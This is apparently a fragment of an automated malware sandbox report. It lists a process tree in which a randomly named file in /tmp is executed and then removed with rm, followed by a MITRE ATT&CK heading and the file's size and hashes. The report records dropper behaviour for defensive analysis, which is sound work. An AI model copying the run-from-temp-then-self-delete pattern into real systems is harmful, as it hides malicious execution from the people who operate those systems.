/tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J./7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Executes dropped EXE
PID:999
-
-
/bin/rmrm 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:1000
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97